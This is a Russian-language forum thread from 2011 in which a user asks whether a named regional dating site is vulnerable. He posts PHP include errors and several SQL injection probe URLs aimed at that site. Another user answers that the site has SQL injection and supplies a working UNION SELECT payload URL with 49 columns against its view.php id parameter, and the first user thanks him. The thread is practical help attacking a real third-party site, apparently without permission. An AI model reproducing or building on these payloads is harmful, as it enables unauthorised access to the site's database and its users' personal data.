Есть ли уязвимость?
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Есть ли уязвимость? - 2011-03-25 03:13:21.800000
|
|
|
Genco
Сообщений: 1662
Оценки: 90
Присоединился: 2007-12-16 23:11:22.003333
|
Такое дело: я не особенно до сих пор вдавался в вопросы безопасности сайта, но сейчас возился с одним (даже больше с целью поиска информации) и наткнулся на кучу ошибок, сыплящихся на некоторых страницах, которые относительно глубоко:
quote:
Warning: main(http://–IPсайта–/ssi/top.txt) [function.main]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /usr/local/apache/virtual/адрес_сайта/love/templates/love/header.php on line 38
Warning: main(http://–IPсайта–/ssi/top.txt) [function.main]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /usr/local/apache/virtual/адрес_сайта/love/templates/love/header.php on line 38
Warning: main() [function.include]: Failed opening 'http://–IPсайта–/ssi/top.txt' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /usr/local/apache/virtual/адрес_сайта/love/templates/love/header.php on line 38
и
quote:
Warning: main(http://–IPсайта–/ssi/down.txt) [function.main]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /usr/local/apache/virtual/адрес_сайта/love/templates/love/footer.php on line 12
Warning: main(http://–IPсайта–/ssi/down.txt) [function.main]: failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found in /usr/local/apache/virtual/адрес_сайта/love/templates/love/footer.php on line 12
Warning: main() [function.include]: Failed opening 'http://–IPсайта–/ssi/down.txt' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /usr/local/apache/virtual/адрес_сайта/love/templates/love/footer.php on line 12
Портал местный кривой вот такой. Соответственно вопрос: это просто огрехи или что-то хоть немного серьезное?
Никогда всерьез не занимался, потому спрашиваю. Кто знает - поделитесь соображениями.
Также интересные результаты дают такие строчки(пробовал сам искать):
[register]
http://portirkutsk.ru/love/view.php?l=&id=VERSION()/*
http://portirkutsk.ru/love/view.php?l=&id=0000002540-1 – она сама
http://portirkutsk.ru/love/view.php?l=&id=0000002540' –ошибки
http://portirkutsk.ru/love/view.php?l=&id=aaaa –редирект на страницу со статистикой, без реги не видно (кажется так)
http://portirkutsk.ru/love/view.php?l=&id=0000002540+union+select+null/*
[/register]
Там такого добра полным-полно разного. С любым профилем работает, их видно все. Очень хочется услышать диагноз))
|
|
|
|
|
RE: Есть ли уязвимость? - 2011-03-25 12:02:30.736666
|
|
|
.i. [^_^] .i.
Сообщений: 13
Оценки: 0
Присоединился: 2011-03-14 22:44:02.636666
|
Нет там никакой уязвимости.
исходя из текста ошибки сценарий просто не может подключить нужный файл,потому как он не доступен, если бы могли влиять на аргумент,тогда бы получился FI.
А вот если загуглить вашу ошибку,то можно найти сайт о котором вы говорите(он о знакомствах?), так вот если это он то в нем уязвимости есть.
Например банальные скули.
|
|
|
|
|
RE: Есть ли уязвимость? - 2011-03-25 14:18:31.903333
|
|
|
Genco
Сообщений: 1662
Оценки: 90
Присоединился: 2007-12-16 23:11:22.003333
|
Да-да, он самый)) Ну, я ж не только из-за ошибок заинтересовался)
http://portirkutsk.ru/love/view.php?l=&id=VERSION()/*
http://portirkutsk.ru/love/view.php?l=&id=0000002540-1 – она сама
http://portirkutsk.ru/love/view.php?l=&id=0000002540' –ошибки
http://portirkutsk.ru/love/view.php?l=&id=aaaa –редирект на страницу со статистикой, без реги не видно (кажется так)
http://portirkutsk.ru/love/view.php?l=&id=0000002540+union+select+null/* –Null пробовал много
Что-то в этом духе+вариации. Но я этим почти не занимался, так что можно небольшую наводку? Почему подстановка в код страницы легко происходит, но любые слова и команды отображаются в ней как текст всего лишь?
|
|
|
|
|
RE: Есть ли уязвимость? - 2011-03-25 20:55:45.020000
|
|
|
.i. [^_^] .i.
Сообщений: 13
Оценки: 0
Присоединился: 2011-03-14 22:44:02.636666
|
http://portirkutsk.ru/love/view.php?l=&id=-0' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49--+
|
|
|
|
|
RE: Есть ли уязвимость? - 2011-03-25 23:11:27.170000
|
|
|
Genco
Сообщений: 1662
Оценки: 90
Присоединился: 2007-12-16 23:11:22.003333
|
Воо, то что надо, спасибо огромное))
|
|
|
|
|
|
